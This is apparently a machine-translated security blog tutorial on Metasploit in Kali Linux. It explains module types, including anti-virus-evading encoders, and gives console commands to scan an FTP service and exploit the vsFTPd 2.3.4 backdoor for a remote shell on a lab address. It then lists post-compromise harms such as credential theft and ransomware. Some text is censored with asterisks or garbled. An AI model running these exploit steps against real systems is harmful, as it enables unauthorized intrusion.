Click " Xianwang Siege Lion " to follow us~
R & D *** improper want people not good luck dimensional
Let us progress a little bit every day
Introduction
The Metasploit*** test framework can be used directly in the kali system, and there is no need to build various complicated environments.
View the installation method of kali system:
***A weapon--the latest version of kali2020 system installation (super detailed)Metasploit is a free, downloadable framework through which you can easily obtain, develop and implement computer software vulnerabilities. It comes with hundreds of professional vulnerabilities*** tools with known software vulnerabilities
Actual combat
Run Metasploit
2. Enter show + module name to view each module
The auxiliary module (auxiliary) scans, discovers vulnerabilities, and detects information. The *** module (exploits) uses the discovered vulnerabilities to attack the remote target system, implant and run the *** load, thereby controlling the target The system payload module (payloads) hijacks the program execution flow and jumps into this code after the vulnerability is triggered. The function of this module is to eliminate the cost of security staff developing this part of the code. The null instruction module (nops) adds some null instructions before executing the shellcode in order to avoid random address and return address errors during the execution of the *** payload. There is a large safe landing area when shellcode is executed. The encoder module (encoders) encodes the *** payload (similar and encrypts), so that the operating system and anti-virus software do not recognize it, but the volume of the payload becomes larger. At this time, you need to select the transmitter and the transmission body paired* **Load to download the target load and run it. The post-****** module (post) first takes an unimportant target (A) to *** the real target (B), and A to perform the real******.
3. For example, I want to see what version of ftp is, and use the use auxiliary/scanner/ftp/ftp_version switch auxiliary module to scan to view the ftp service version.
set rhosts 192.168.88.45
--Configure the target ip address can also configure the domain name
set rport 21
--Configure the target portrun
--Run scan
You can see the ftp service version vsFTPd 2.3.4 in the figure
4. Use search vsFTPd 2.3.4 to search for related vulnerabilities in the current version. You can see in the figure that a related vulnerability is matched and an exp (vulnerability exploit module) is listed.
5. Switch to the exploit module of exp to perform ***,
use exploit/unix/ftp/vsftpd_234_backdoor
--Switch to the *** module
set rhosts 192.168.88.45
--Configuration target
run
--Run the ****** target
As you can see in the above figure, an interactive shell has been established to execute any command. After successful, your server is equivalent to mine. Hey! --What do you want to do.
6.***What can be done after success?
A few years ago when everyone had a weak security awareness, they didn't care too much about network security. Let everyone spread security knowledge about what hackers can do after your computer is compromised.
A. Embed the *** program, you record your username and password when you transfer money online, to carry out network theft
B. Implanting a mining program, which consumes your computer's CPU and GPU for mining, causing the computer to freeze and fail to access the Internet, etc.
C. Planting a virus program, causing the computer to blue screen, unusable, etc.
D. Plant ransomware, encrypt your work data and demand a ransom from you.
Past content
Android*** tool drozer installation and use
***A weapon--the latest version of kali2020 system installation (super detailed)
Take you into the world of CTF (It's boring and you must understand/(ㄒoㄒ)/)
100 basic network knowledge, see the completion of half of the network master!
More informationLong press the QR code to follow us
The professional information security team gives you the safest guarantee. Regularly push *** knowledge and network security knowledge articles, so that you can understand the world of ***, learn *** knowledge, popularize security knowledge, and improve security awareness.
I think it's good, click a "like"